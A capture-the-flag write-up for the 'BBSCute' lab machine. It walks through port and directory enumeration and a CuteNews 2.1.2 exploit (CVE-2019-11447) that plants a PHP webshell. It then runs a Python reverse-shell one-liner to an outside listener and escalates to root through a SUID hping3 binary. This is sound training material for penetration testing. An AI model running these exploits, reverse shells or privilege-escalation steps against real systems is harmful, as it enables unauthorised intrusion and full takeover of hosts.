BBSCute - Easy
Enumeration
Nmap
┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ sudo nmap -sC -sV -oN nmap.out 192.168.129.128
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-07 08:56 +0630
Nmap scan report for 192.168.129.128
Host is up (0.29s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
| 256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_ 256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 404 Not Found
110/tcp open pop3 Courier pop3d
|_pop3-capabilities: STLS LOGIN-DELAY(10) PIPELINING USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Courier pop3d
|_pop3-capabilities: TOP LOGIN-DELAY(10) PIPELINING USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.67 seconds
baDirectory Scanning
┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ sudo dirsearch -u http://192.168.129.128 -w /opt/SecLists/Discovery/Web-Content/common.txt -r -t 60 --full-url
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 60 | Wordlist size: 4686
Output File: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/reports/192.168.129.128/_21-11-07_09-27-56.txt
Error Log: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/logs/errors-21-11-07_09-27-56.log
Target: http://192.168.129.128/
[09:27:57] Starting:
[09:28:14] 301 - 317B - http://192.168.129.128/core -> http://192.168.129.128/core/ (Added to queue)
[09:28:16] 301 - 317B - http://192.168.129.128/docs -> http://192.168.129.128/docs/ (Added to queue)
[09:28:17] 200 - 1KB - http://192.168.129.128/favicon.ico
[09:28:20] 200 - 10KB - http://192.168.129.128/index.html
[09:28:20] 200 - 6KB - http://192.168.129.128/index.php
[09:28:21] 301 - 317B - http://192.168.129.128/libs -> http://192.168.129.128/libs/ (Added to queue)
[09:28:22] 301 - 319B - http://192.168.129.128/manual -> http://192.168.129.128/manual/ (Added to queue)
[09:28:29] 403 - 280B - http://192.168.129.128/server-status
[09:28:31] 301 - 318B - http://192.168.129.128/skins -> http://192.168.129.128/skins/ (Added to queue)
[09:28:34] 301 - 320B - http://192.168.129.128/uploads -> http://192.168.129.128/uploads/ (Added to queue)
[09:28:37] Starting: core/
[09:28:47] 301 - 325B - http://192.168.129.128/core/captcha -> http://192.168.129.128/core/captcha/ (Added to queue)
[09:28:47] 301 - 326B - http://192.168.129.128/core/ckeditor -> http://192.168.129.128/core/ckeditor/ (Added to queue)
[09:28:49] 301 - 320B - http://192.168.129.128/core/db -> http://192.168.129.128/core/db/ (Added to queue)
[09:28:54] 301 - 326B - http://192.168.129.128/core/includes -> http://192.168.129.128/core/includes/ (Added to queue)
[09:28:55] 200 - 0B - http://192.168.129.128/core/index.html
[09:28:56] 301 - 322B - http://192.168.129.128/core/lang -> http://192.168.129.128/core/lang/ (Added to queue)
[09:28:58] 301 - 325B - http://192.168.129.128/core/modules -> http://192.168.129.128/core/modules/ (Added to queue)
[09:29:07] 301 - 323B - http://192.168.129.128/core/tools -> http://192.168.129.128/core/tools/ (Added to queue) Web
Default install page for Apache on Port 80
In index.php , We got a login page.
I tried default credentials and some sql injection but nothing work. So let's create a new users.
As you see , we need Captcha to register account, but it's not load on the page.
But in the source code, we can see captcha.php
When we click on that, we will get captcha text .
We can use this Captcha to register accounts.
Finding Exploit
In the bottom of page, we can see that is running Cutenews 2.1.2 , When I google about this and I found and exploit for this.
Clone this repo and run it.
python3 CVE-2019-11447.py <username> <pass> http://IP/index.php
┌─[sheinn101@parrot]─[~/offsec/BBSCute/CVE-2019-11447-POC]
└──╼ [??]$ python3 CVE-2019-11447.py shein shein http://192.168.129.128/index.php
-.-. --- --- .-.. .... ....- -..- --- .-. -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as shein:shein
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: eb376c517713a1ebc76154a292a7044f-shein
[+] __signature_dsi: 7a551d498ea9f93dbe638fcfd9e71f34
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://192.168.129.128/uploads/avatar_shein_31095.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR
$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$>Getting Reverse Shell
Now we get a shell. To get a stable shell , Listen with netcat and run the following command
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.135",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [192.168.49.135] from (UNKNOWN) [192.168.135.128] 35872
which python
which python
/usr/bin/python
python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cute:/var/www/html/uploads$Now we get a stable shell. As a easy box, let's find what binary has SUID bit is set.
Privilege Escaplation
find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/sbin/hping3
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
www-data@cute:/home/fox$We can see hping3 has SUID bit. When we find hping3 in GTFObin and we can see like this,
hping3 has already SUID bit and we don't need to add sudo . Run hping3 and type /bin/bash -p
hping3
/bin/bash -p
/bin/bash -p
id; whoami
id; whoami
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
root
bash-5.0#Now we pwned it.
Last updated
